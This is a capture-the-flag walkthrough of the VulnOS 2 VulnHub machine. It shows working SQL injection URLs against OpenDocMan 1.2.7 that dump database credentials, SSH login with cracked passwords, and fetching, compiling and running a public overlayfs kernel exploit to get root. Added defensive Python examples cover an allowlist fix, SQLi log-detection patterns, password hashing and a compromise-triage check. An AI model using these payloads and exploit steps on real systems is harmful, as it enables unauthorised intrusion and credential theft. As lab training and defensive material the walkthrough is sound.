VulnOS 2 Walkthrough (OSCP Prep)

Introduction
Continuing our series of write-ups for OSCP-like VulnHub boxes, today we’ll tackle the VulnOS 2 virtual machine.
VulnOS 2 is an Ubuntu box running SSH, HTTP, and, interestingly, an IRC daemon. To get root, we’ll need to enumerate the webserver to find a classic SQL injection vulnerability. We’ll then use the SQLi to capture credentials and log in over SSH. Once on the system, some basic enumeration will lead us to a kernel exploit to pop a root shell.
Description
The author’s description of this box is short and sweet:
Your assignment is to pentest a company website, get root of the system and read the final flag
Host Discovery
Before we can begin our reconnaissance, we need to know where the target lives. We’ll use arp-scan.
(ori0n@apophis) --> [ ~/vulnos ]
==> sudo arp-scan -l
[sudo] password for ori0n:
Interface: ens33, type: EN10MB, MAC: 00:0c:29:8d:fb:0b, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1 00:50:56:c0:00:08 VMware, Inc.
10.0.10.2 00:50:56:fb:3b:27 VMware, Inc.
10.0.10.11 00:0c:29:e2:a7:d8 VMware, Inc.
10.0.10.125 00:0c:29:46:0a:c0 VMware, Inc.
10.0.10.199 00:50:56:fa:5e:2b VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 5 responded
Our target is at 10.0.10.125. I’ll add an entry in /etc/hosts.
10.0.10.125 vulnos
Scanning
We’ll run a port scan to see what ports the VulnOS machine has listening for us. RustScan will do the trick.
(ori0n@apophis) --> [ ~/vulnos ]
==> rustscan -a vulnos -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.125:22
Open 10.0.10.125:80
Open 10.0.10.125:6667
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.125
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 17:59 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 17:59
Scanning 10.0.10.125 [2 ports]
Completed Ping Scan at 17:59, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 17:59
Scanning vulnos (10.0.10.125) [3 ports]
Discovered open port 22/tcp on 10.0.10.125
Discovered open port 80/tcp on 10.0.10.125
Discovered open port 6667/tcp on 10.0.10.125
Completed Connect Scan at 17:59, 0.00s elapsed (3 total ports)
Initiating Service scan at 18:00
Scanning 3 services on vulnos (10.0.10.125)
Completed Service scan at 18:00, 11.03s elapsed (3 services on 1 host)
NSE: Script scanning 10.0.10.125.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Nmap scan report for vulnos (10.0.10.125)
Host is up, received syn-ack (0.00042s latency).
Scanned at 2021-08-11 17:59:59 CDT for 12s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc syn-ack ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
It looks like we have the standard SSH and HTTP servers as well as an IRC daemon running on the box. We’ll start by enumerating HTTP.
Enumerating the Web Server
Fire up a browser and navigate to http://vulnos/. The index page directs us to the /jabc directory, so follow the link to head there.
After poking around the site for a minute, we land on the ‘Documentation’ page, which appears to contain a whole lot of nothing. But trying to highlight the page reveals some “hidden” text.
So we learn of another application running on the server and get some guest credentials to boot. Let’s have a look at this /jabcd0cs directory.
We find the version number of the application, OpenDocMan 1.2.7, at the bottom of the page. Perhaps SearchSploit will know something about this app?
(ori0n@apophis) --> [ ~/vulnos ]
==> searchsploit opendocman 1.2.7
-------------------------------------------- -----------------------
Exploit Title | Path
-------------------------------------------- -----------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities | php/webapps/32075.txt
-------------------------------------------- -----------------------
Shellcodes: No Results
So there is an SQL injection vulnerability in the ajax_udf.php page. We are given a proof of concept. Let’s adjust the URL to our target host and verify the bug:
http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
We see the MySQL version string displayed in the drop-down box. It works!
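The injection above lands in the add_value parameter, which the page uses as a table name, and that detail matters for the fix: an identifier cannot be bound as a query parameter, so prepared statements alone would not have closed this hole. The following added example (my own code, not OpenDocMan’s) reproduces the flaw against a constructed SQLite schema and shows the allowlist check that stops it. Table names, rows and the PAYLOAD string are all constructed for the demo.

```python
import sqlite3

# Allowlist of identifiers the endpoint may ever read from (constructed for this demo).
ALLOWED_TABLES = frozenset({"odm_department", "odm_category"})

# Same shape as the write-up's add_value payload, rewritten against the demo schema below.
PAYLOAD = "odm_department UNION SELECT id, username || ':' || password FROM odm_user"


def demo_db():
    """In-memory database with constructed rows; nothing here is data from the box."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE odm_department (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO odm_department VALUES (1, 'Sales'), (2, 'IT');
        CREATE TABLE odm_category (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO odm_category VALUES (1, 'Policies');
        CREATE TABLE odm_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO odm_user VALUES (1, 'webmin', 'CONSTRUCTED_HASH_1'),
                                    (2, 'guest',  'CONSTRUCTED_HASH_2');
    """)
    return conn


def fetch_options_unsafe(conn, table):
    """Vulnerable pattern: the request-controlled table name is pasted into the SQL text,
    so a value like PAYLOAD rewrites the whole statement and pulls rows from odm_user."""
    return conn.execute(f"SELECT id, name FROM {table}").fetchall()


def fetch_options_safe(conn, table):
    """Hardened pattern: an identifier cannot be bound as a query parameter, so the value
    is compared against a fixed allowlist before it reaches the query, then quoted."""
    if table not in ALLOWED_TABLES:
        raise ValueError(f"table not permitted: {table!r}")
    return conn.execute(f'SELECT id, name FROM "{table}"').fetchall()


if __name__ == "__main__":
    conn = demo_db()
    print("unsafe:", fetch_options_unsafe(conn, PAYLOAD))  # leaks odm_user rows
    try:
        fetch_options_safe(conn, PAYLOAD)
    except ValueError as exc:
        print("safe:", exc)
```

The allowlist is the whole fix: once the identifier is known to be one of a handful of fixed names, quoting it is belt-and-braces rather than the defence. Trying to bind the table name with a `?` placeholder instead would turn it into a string literal and fail with a syntax error, which is why this class of bug survives in code bases that otherwise use prepared statements.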
Let’s try to dump the usernames and passwords from the mysql.user table.
http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(user,0x3a,password),3,4,5,6,7,8,9%20from%20mysql.user
Cleaning these up and feeding them to CrackStation gives us the password toor for three users.
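Every one of these requests went through Apache’s access log in plain view, so this is also a good point to look at the defender’s side. The added example below (mine, not part of the original write-up) runs a few simple rules over constructed access-log lines whose URLs mirror the shape of the requests above: it decodes each query parameter and flags UNION SELECT stacking, reads of MySQL system tables, and version() fingerprinting. The log lines, client addresses and rule names are all constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-log lines; URLs follow the shape of the requests in this write-up.
SAMPLE_LOG = """\
10.0.10.10 - - [11/Aug/2021:18:05:01 -0500] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.10.10 - - [11/Aug/2021:18:05:09 -0500] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 340 "-" "Mozilla/5.0"
10.0.10.10 - - [11/Aug/2021:18:05:31 -0500] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(user,0x3a,password),3,4,5,6,7,8,9%20from%20mysql.user HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
10.0.10.11 - - [11/Aug/2021:18:06:00 -0500] "GET /jabc/index.php?q=node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client, timestamp, request line and status from the common/combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules applied to each percent-decoded, lower-cased query value.
RULES = [
    ("union-select", re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b")),
    ("system-table", re.compile(r"\b(mysql\.user|information_schema)\b")),
    ("fingerprint", re.compile(r"\bversion\s*\(\s*\)")),
]


def scan_access_log(text):
    """Return one finding per (request, parameter, rule) hit as (ip, path, param, rule)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl already decoded once; a second pass catches double-encoding.
            decoded = unquote_plus(value).lower()
            for rule, pattern in RULES:
                if pattern.search(decoded):
                    findings.append((m.group("ip"), parts.path, name, rule))
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Two hits on the same parameter from the same client within seconds is the pattern to alert on; the first, harmless add_value=odm_user request is the baseline that shows what normal traffic to this endpoint looks like.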
Trying these over SSH, however, yields nothing.
Getting a Foothold
Moving on, let’s try to dump the OpenDocMan credentials. We can already determine from our exploit URL that the OpenDocMan users table is called odm_user. Instead of trying to enumerate the table schema, search the GitHub repo for odm_user. Bingo! We find the database.sql file with the schema:
CREATE TABLE odm_user (
id int(11) unsigned NOT NULL auto_increment,
username varchar(25) NOT NULL default '',
password varchar(50) NOT NULL default '',
department int(11) unsigned default NULL,
phone varchar(20) default NULL,
Email varchar(50) default NULL,
last_name varchar(255) default NULL,
first_name varchar(255) default NULL,
pw_reset_code char(32) default NULL,
can_add tinyint(1) NULL DEFAULT 1,
can_checkin tinyint(1) NULL DEFAULT 1,
PRIMARY KEY (id)
) ENGINE = MYISAM;
Now let’s modify our SQLi to dump the username and password fields of this table:
http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9%20from%20odm_user
We can try to crack the webmin hash with CrackStation, but no luck this time. Let’s try Hashes.com instead.
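The reason lookup services like CrackStation work at all here is that neither store salts its hashes: three MySQL accounts with the same password produced the same hash string, which is visible before anything is cracked. The added example below (mine, not from the write-up) builds MySQL’s mysql_native_password form for a constructed user table, shows that duplicate hashes expose shared passwords, and contrasts it with a salted, iterated PBKDF2 scheme where the same passwords no longer collide. It assumes the dumped mysql.user hashes were mysql_native_password values, which the write-up does not confirm; usernames other than the password toor are constructed.

```python
import hashlib
import hmac
import os

# Constructed accounts: three share the password seen in the write-up, one does not.
SAMPLE_USERS = [
    ("svc_backup", "toor"),
    ("svc_report", "toor"),
    ("dbadmin", "toor"),
    ("auditor", "correct horse battery staple"),
]


def mysql_native_hash(password):
    """mysql_native_password: '*' + hex(SHA1(SHA1(pw))). No salt and no work factor, so
    equal passwords give equal hashes and one precomputed table answers every account."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, iterated alternative stored as 'salt_hex$iterations$digest_hex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def duplicate_hash_groups(stored):
    """stored: iterable of (username, hash). Returns lists of users whose hashes collide,
    which for an unsalted scheme means they share a password."""
    by_hash = {}
    for user, h in stored:
        by_hash.setdefault(h, []).append(user)
    return [users for users in by_hash.values() if len(users) > 1]


if __name__ == "__main__":
    native = [(u, mysql_native_hash(p)) for u, p in SAMPLE_USERS]
    print("unsalted collisions:", duplicate_hash_groups(native))
    salted = [(u, pbkdf2_hash(p)) for u, p in SAMPLE_USERS]
    print("salted collisions:", duplicate_hash_groups(salted))
```

Grouping by hash is also a cheap audit to run on your own credential stores: any group with more than one member is a shared password, and any scheme that lets you see that at a glance is a scheme an attacker with a dump can reverse with a lookup table.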
So we’ve seen the webmin user twice now. Maybe he has an SSH account?
(ori0n@apophis) --> [ ~/vulnos ]
==> ssh webmin@vulnos
webmin@vulnos's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information disabled due to load higher than 2.0
Last login: Wed May 4 10:41:07 2016
$
And we’re in!
Privilege Escalation – On To Root
Now that we have a shell on the target, the first thing we should do is determine which distro and kernel we are running.
$ cat /proc/version && cat /etc/*release
Linux version 3.13.0-24-generic (buildd@komainu) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
NAME="Ubuntu"
VERSION="14.04.4 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.4 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
We’re on Ubuntu 14.04.4 running kernel version 3.13.0-24-generic. Off to trusty SearchSploit to see if we’ll have an easy path to root.
( ori0n@apophis ) : [ ~ ]
==> searchsploit ubuntu 14.04 3.13 | grep -v 'x86.64'
--------------------------------------------------------------------------------------------------------------------- -----------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- -----------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/sh | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
--------------------------------------------------------------------------------------------------------------------- -----------------------
Shellcodes: No Results
Let’s try the first hit. I’ll locate this source file on GitHub to pull it directly down to the victim.
$ cd /tmp
$ wget https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/overlayfs/ofs_32.c
--2021-08-12 02:55:09-- https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/overlayfs/ofs_32.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: ‘ofs_32.c’
100%[=================================================================>] 5,123 --.-K/s in 0s
2021-08-12 02:55:10 (33.0 MB/s) - ‘ofs_32.c’ saved [5123/5123]
Reading from the source, this looks like a straightforward build. Let’s try to compile and run.
$ gcc -o ofs ofs_32.c
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
And rooted!
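Two things in the last few steps are worth turning into a repeatable check for anyone defending a box like this: the kernel and distro enumeration that pointed at the overlayfs advisory, and the line “/etc/ld.so.preload created” in the exploit output, which is the artefact the exploit leaves behind. The added example below (my own code, not the exploit’s and not from the write-up) parses /proc/version and /etc/os-release text, reports whether the kernel falls inside the range named in the searchsploit title (3.13.0 up to but not including 3.19), and lists any library in /etc/ld.so.preload that the host owner did not expect. The input strings are constructed to match the output shown earlier; the preload path in the test is a constructed placeholder.

```python
import re

# Inputs constructed to match the shape of the output shown earlier in this write-up.
PROC_VERSION = ("Linux version 3.13.0-24-generic (buildd@komainu) "
                "(gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014")
OS_RELEASE = 'NAME="Ubuntu"\nVERSION="14.04.4 LTS, Trusty Tahr"\nID=ubuntu\nID_LIKE=debian\nVERSION_ID="14.04"\n'

# Affected range as stated in the searchsploit title: 3.13.0 <= kernel < 3.19.
OVERLAYFS_RANGE = ((3, 13, 0), (3, 19, 0))


def parse_kernel_version(proc_version):
    """Extract (major, minor, patch) from a /proc/version line."""
    m = re.search(r"Linux version (\d+)\.(\d+)\.(\d+)", proc_version)
    if m is None:
        raise ValueError("no kernel version found")
    return tuple(int(part) for part in m.groups())


def parse_os_release(text):
    """Turn KEY=VALUE lines from /etc/os-release into a dict, dropping surrounding quotes."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        info[key] = value.strip('"')
    return info


def kernel_in_range(version, version_range):
    """True when low <= version < high for a (low, high) pair of version tuples."""
    low, high = version_range
    return low <= version < high


def unexpected_preload_entries(ld_so_preload_text, allowed=()):
    """/etc/ld.so.preload is normally absent or empty. Any library listed there that the
    host owner did not add is a strong indicator of the preload hijack reported above."""
    entries = [line.strip() for line in ld_so_preload_text.splitlines()]
    return [e for e in entries if e and not e.startswith("#") and e not in allowed]


def triage(proc_version, os_release_text, ld_so_preload_text=""):
    """Summarise the host: kernel, distro, advisory-range match and preload indicators."""
    version = parse_kernel_version(proc_version)
    release = parse_os_release(os_release_text)
    return {
        "kernel": ".".join(str(p) for p in version),
        "distro": f"{release.get('ID', '?')} {release.get('VERSION_ID', '?')}",
        "overlayfs_advisory_range": kernel_in_range(version, OVERLAYFS_RANGE),
        "unexpected_preload": unexpected_preload_entries(ld_so_preload_text),
    }


if __name__ == "__main__":
    print(triage(PROC_VERSION, OS_RELEASE))
```

A version-string match is a prompt to look, not a verdict: distributions backport fixes without bumping the upstream version, so the authoritative answer comes from the installed kernel package version against the vendor’s advisory. The ld.so.preload check has no such ambiguity, and an empty or absent file is the only state a server like this should ever be in.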
We have one final order of business: find the flag. This is typically found in the /root directory, so head over and see what we can find.
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 165 May 4 2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
Wrapping Up
VulnOS 2 ended up being a relatively simple box that required basic enumeration and a few classics: SQL injection and kernel exploitation. The path was fairly straightforward if you read between the lines a bit and performed standard enumeration once you had shell access.